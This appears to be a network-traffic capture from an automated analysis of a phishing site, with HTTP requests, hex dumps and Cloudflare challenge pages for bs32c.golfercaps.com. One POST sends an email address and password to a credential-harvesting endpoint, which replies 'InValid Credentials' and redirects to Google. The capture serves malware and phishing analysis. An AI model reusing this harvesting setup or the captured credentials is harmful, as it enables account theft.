                                                                  73192.168.2.458571188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:07 UTC361OUTGET /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:07 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:43:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:43:07 UTC914INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 36 69 68 39 4e 50 76 57 74 5a 46 5a 6d 57 38 30 70 6a 39 66 57 54 6a 37 6b 78 4b 5a 47 4c 34 6c 76 6a 7a 4a 57 58 74 31 50 34 31 6f 49 50 69 44 75 4d 47 7a 31 4d 50 33 33 36 4d 6c 38 69 6d 41 55 59 57 50 62 64 41 4a 74 42 49 45 4f 50 77 46 61 2f 6d 46 32 6f 47 42 7a 69 75 73 4f 76 5a 35 69 51 54 37 74 4b 46 43 44 69 34 3d 24 45 66 57 4e 56 5a 72 2b 37 6b 31 61 58 75 68 51 49 30 53 6c 63 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: 6ih9NPvWtZFZmW80pj9fWTj7kxKZGL4lvjzJWXt1P41oIPiDuMGz1MP336Ml8imAUYWPbdAJtBIEOPwFa/mF2oGBziusOvZ5iQT7tKFCDi4=$EfWNVZr+7k1aXuhQI0Slcg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 32 32 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 225d<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 51 67 79 32 4a 49 5f 4c 32 45 51 58 33 64 2e 5f 4e 32 59 4f 32 75 36 2e 59 41 6b 54 45 55 45 53 52 62 7a 63 50 31 62 7a 34 6b 75 33 6e 36 6f 38 56 42 63 32 30 66 70 6d 63 76 74 34 63 76 4b 73 48 57 6d 5f 70 43 66 43 62 5a 6f 50 75 6b 79 55 37 78 55 36 6a 74 50 66 30 54 72 54 7a 33 36 36 5f 64 6c 4a 54 5a 33 6a 49 4f 37 64 4a 4b 6d 35 65 44 4d 6b 44 6c 73 6a 68 44 59 67 68 68 68 61 70 34 49 38 5a 79 52 37 52 66 75 63 69 33 4e 67 52 75 79 4b 68 6f 4f 30 74 76 48 6c 75 76 61 67 47 45 4c 37 34 79 52 51 57 30 39 4a 4a 4b 4b 64 72 6a 52 30 4b 61 6a 49 50 59 6b 57 33 69 4e 44 50 4a 55 4a 4b 54 67 47 5f 7a 41 6c 45 42 66 52 4d 37 66 6a 4c 38 42 57 4b 70 6a 7a 37 31 6d 62 77 50 54 42 56 68 55 5a 7a 76 76 67 46 48 57 47 35 2e 4a 6f 4f 6c 49 69 34 4a 4f 79 4d 4b 5f
                                                                  Data Ascii: Qgy2JI_L2EQX3d._N2YO2u6.YAkTEUESRbzcP1bz4ku3n6o8VBc20fpmcvt4cvKsHWm_pCfCbZoPukyU7xU6jtPf0TrTz366_dlJTZ3jIO7dJKm5eDMkDlsjhDYghhhap4I8ZyR7Rfuci3NgRuyKhoO0tvHluvagGEL74yRQW09JJKKdrjR0KajIPYkW3iNDPJUJKTgG_zAlEBfRM7fjL8BWKpjz71mbwPTBVhUZzvvgFHWG5.JoOlIi4JOyMK_
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 6c 79 4e 66 2e 44 59 37 77 64 4b 6b 49 78 71 45 65 65 39 58 4a 42 73 73 65 33 44 58 58 35 7a 79 6c 61 51 59 31 6e 5a 37 6a 47 46 78 50 69 57 4b 6a 6a 5f 6e 6e 38 72 4b 5f 61 4d 78 57 73 45 67 67 31 4e 33 47 52 74 4b 4f 63 38 4f 59 34 44 63 59 2e 73 45 50 78 46 58 79 6c 59 67 46 55 62 51 77 34 64 47 74 59 32 69 77 31 46 4a 53 7a 6e 55 63 38 55 66 36 76 73 5f 46 7a 53 38 6a 32 55 4d 38 4a 6c 7a 78 59 65 55 33 56 41 6c 36 41 48 53 64 39 54 6d 71 62 51 67 35 57 38 6e 57 47 44 52 4d 49 4c 50 6a 65 74 51 31 4f 35 71 6b 38 52 6d 5f 47 75 62 49 68 44 67 47 6b 2e 6f 70 78 4e 69 36 72 58 6e 39 63 74 50 4a 6f 4c 33 72 32 4a 30 57 30 66 4c 6a 37 7a 38 72 2e 30 68 54 51 50 61 33 4b 76 70 75 58 32 6a 4a 61 58 55 69 32 6b 54 62 64 50 6a 57 38 72 63 45 79 30 51 70 6e 67
                                                                  Data Ascii: lyNf.DY7wdKkIxqEee9XJBsse3DXX5zylaQY1nZ7jGFxPiWKjj_nn8rK_aMxWsEgg1N3GRtKOc8OY4DcY.sEPxFXylYgFUbQw4dGtY2iw1FJSznUc8Uf6vs_FzS8j2UM8JlzxYeU3VAl6AHSd9TmqbQg5W8nWGDRMILPjetQ1O5qk8Rm_GubIhDgGk.opxNi6rXn9ctPJoL3r2J0W0fLj7z8r.0hTQPa3KvpuX2jJaXUi2kTbdPjW8rcEy0Qpng
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 6a 55 71 46 63 6a 77 44 71 76 71 4f 47 75 6b 32 6c 2e 49 4c 61 63 6f 66 61 42 54 48 4c 54 5f 71 67 4d 7a 55 36 70 34 72 53 68 44 49 36 32 57 70 52 34 4a 32 5a 63 51 56 4f 5a 66 4c 32 66 55 78 31 31 38 53 66 35 51 52 57 58 73 36 58 52 57 64 54 77 38 33 41 6c 59 46 46 67 35 75 70 7a 56 58 33 34 59 50 63 45 50 31 2e 7a 62 66 48 32 51 46 35 6d 5a 45 62 65 4d 51 79 4e 64 53 41 57 69 5f 71 48 4a 66 65 73 43 64 6f 53 78 61 49 38 6d 4b 6a 46 35 53 59 74 59 4c 34 77 35 70 69 70 56 71 67 5f 77 54 4c 6b 6d 54 72 4b 58 37 67 66 42 5f 46 45 52 4c 62 69 4f 36 75 4c 36 4f 6a 68 6a 53 48 61 42 78 6f 6d 33 2e 5f 74 4e 78 65 6c 79 52 36 6c 50 33 74 72 70 58 6d 74 74 51 41 6b 73 4f 5f 78 34 4f 65 74 59 43 46 32 55 37 67 59 52 67 61 51 75 6a 4a 37 4d 6c 57 77 68 4e 44 51 4e
                                                                  Data Ascii: jUqFcjwDqvqOGuk2l.ILacofaBTHLT_qgMzU6p4rShDI62WpR4J2ZcQVOZfL2fUx118Sf5QRWXs6XRWdTw83AlYFFg5upzVX34YPcEP1.zbfH2QF5mZEbeMQyNdSAWi_qHJfesCdoSxaI8mKjF5SYtYL4w5pipVqg_wTLkmTrKX7gfB_FERLbiO6uL6OjhjSHaBxom3._tNxelyR6lP3trpXmttQAksO_x4OetYCF2U7gYRgaQujJ7MlWwhNDQN
                                                                  2024-12-30 21:43:07 UTC1369INData Raw: 68 53 43 69 67 47 58 4c 67 4f 53 77 35 6f 34 39 33 53 66 64 74 44 55 32 67 71 76 75 35 63 49 4b 67 72 68 72 33 2e 4d 4d 6b 2e 6b 51 46 2e 53 4e 43 4d 59 6b 54 34 61 6c 73 71 59 36 32 78 4d 43 59 31 49 30 6a 75 4d 65 38 36 63 4d 2e 6b 45 49 61 54 4f 39 4a 73 55 55 56 52 62 78 4a 79 73 6b 37 4d 4f 58 4d 51 47 58 38 4c 44 4e 54 6e 54 56 79 36 33 48 4a 79 79 34 36 32 4a 36 64 61 34 6e 62 61 74 36 47 67 50 5f 68 70 49 61 71 36 52 4f 31 58 79 42 77 70 30 4c 75 41 77 50 46 78 67 32 59 2e 43 56 4b 79 6c 50 56 34 53 56 4d 4d 5f 64 58 50 33 33 67 41 4e 49 6b 52 61 4b 45 42 37 57 59 64 4f 69 32 4d 51 4b 4c 75 34 65 2e 37 32 31 6c 42 6f 44 6a 70 35 68 6d 59 62 74 33 75 68 31 79 2e 6b 36 50 6e 7a 31 72 6a 59 57 68 34 59 6d 7a 34 7a 78 58 41 30 33 4c 47 34 69 71 70 47
                                                                  Data Ascii: hSCigGXLgOSw5o493SfdtDU2gqvu5cIKgrhr3.MMk.kQF.SNCMYkT4alsqY62xMCY1I0juMe86cM.kEIaTO9JsUUVRbxJysk7MOXMQGX8LDNTnTVy63HJyy462J6da4nbat6GgP_hpIaq6RO1XyBwp0LuAwPFxg2Y.CVKylPV4SVMM_dXP33gANIkRaKEB7WYdOi2MQKLu4e.721lBoDjp5hmYbt3uh1y.k6Pnz1rjYWh4Ymz4zxXA03LG4iqpG
                                                                  2024-12-30 21:43:07 UTC591INData Raw: 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c
                                                                  Data Ascii: ength - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null,
                                                                  2024-12-30 21:43:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  74192.168.2.45863435.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:16 UTC545OUTOPTIONS /report/v4?s=jPIXxCltmBBULJ8FBX8OjyVqWbtk2qN9bijXNg4yLfjXVpVPcNycE0evqGnrECwDMlXOmH3BTWAJrErXBuBko38dsZAcElM1tdtUxErpLnCtwXLOEQPUOT6moAx1QQMGhSQg6PA8bA%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:17 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: OPTIONS, POST
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-type, content-length
                                                                  date: Mon, 30 Dec 2024 21:43:16 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  75192.168.2.45863535.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:16 UTC549OUTOPTIONS /report/v4?s=AU249RWVWZn2ffQ1wYMTlvjCqHYBdvRNSSthIU8p%2FG4730ZdRrVtVG94n7XZfOfslr8eamZQCN2AyjQfZSGDuD97SzhOUnX0PJ1Cx23U%2FH6Uoc2Nf0E3K56fzi5aRKa1be5HLxQqeg%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:17 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: OPTIONS, POST
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-type, content-length
                                                                  date: Mon, 30 Dec 2024 21:43:16 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  76192.168.2.458640188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:17 UTC1532OUTPOST /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 72
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:43:17 UTC72OUTData Raw: 61 69 3d 73 65 61 6e 25 34 30 76 69 72 74 75 61 6c 69 6e 74 65 6c 6c 69 67 65 6e 63 65 62 72 69 65 66 69 6e 67 2e 63 6f 6d 26 70 72 3d 39 38 50 38 25 35 42 53 21 52 76 6c 25 32 36 25 32 33 25 37 42 50 76 25 35 45 30
                                                                  Data Ascii: ai=sean%40virtualintelligencebriefing.com&pr=98P8%5BS!Rvl%26%23%7BPv%5E0
                                                                  2024-12-30 21:43:17 UTC800INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:43:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ittLXvGS7i5koSA%2BiHuAXiymykvYGWIQK4mHqKi1UrXF6meIAAjZ16Crg%2FL5ZshHtTiQImbgEm9XxqCtKI8Ol9H%2FGfZWIKVuDCIyiwIcPg2lQ%2Bop8JQYnaiIz59y5wnCCxknQ4g3vQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5345decb94340-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1656&rtt_var=674&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2226&delivery_rate=1763285&cwnd=217&unsent_bytes=0&cid=7c401fad733a3286&ts=600&x=0"
                                                                  2024-12-30 21:43:17 UTC94INData Raw: 35 38 0d 0a 7b 22 73 69 67 6e 61 6c 22 3a 22 6f 6b 22 2c 22 6d 73 67 22 3a 22 49 6e 56 61 6c 69 64 20 43 72 65 64 65 6e 74 69 61 6c 73 22 2c 22 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 22 7d 0d 0a
                                                                  Data Ascii: 58{"signal":"ok","msg":"InValid Credentials","redirect_link":"https:\/\/www.google.com\/"}
                                                                  2024-12-30 21:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  77192.168.2.45864235.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:17 UTC483OUTPOST /report/v4?s=jPIXxCltmBBULJ8FBX8OjyVqWbtk2qN9bijXNg4yLfjXVpVPcNycE0evqGnrECwDMlXOmH3BTWAJrErXBuBko38dsZAcElM1tdtUxErpLnCtwXLOEQPUOT6moAx1QQMGhSQg6PA8bA%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 9796
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:17 UTC9796OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 30 38 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 73 33 32 63 2e 67 6f 6c 66 65 72 63 61 70 73 2e 63 6f 6d 2f 76 66 64 32 33 63 65 64 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f
                                                                  Data Ascii: [{"age":58084,"body":{"elapsed_time":895,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bs32c.golfercaps.com/vfd23ced/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"netwo
                                                                  2024-12-30 21:43:17 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Mon, 30 Dec 2024 21:43:17 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  78192.168.2.45864335.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:17 UTC487OUTPOST /report/v4?s=AU249RWVWZn2ffQ1wYMTlvjCqHYBdvRNSSthIU8p%2FG4730ZdRrVtVG94n7XZfOfslr8eamZQCN2AyjQfZSGDuD97SzhOUnX0PJ1Cx23U%2FH6Uoc2Nf0E3K56fzi5aRKa1be5HLxQqeg%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 2937
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:17 UTC2937OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 33 30 31 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 31 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 73 33 32 63 2e 67 6f 6c 66 65 72
                                                                  Data Ascii: [{"age":43012,"body":{"elapsed_time":1114,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://bs32c.golfer
                                                                  2024-12-30 21:43:17 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Mon, 30 Dec 2024 21:43:17 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  79192.168.2.458653188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:18 UTC361OUTGET /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
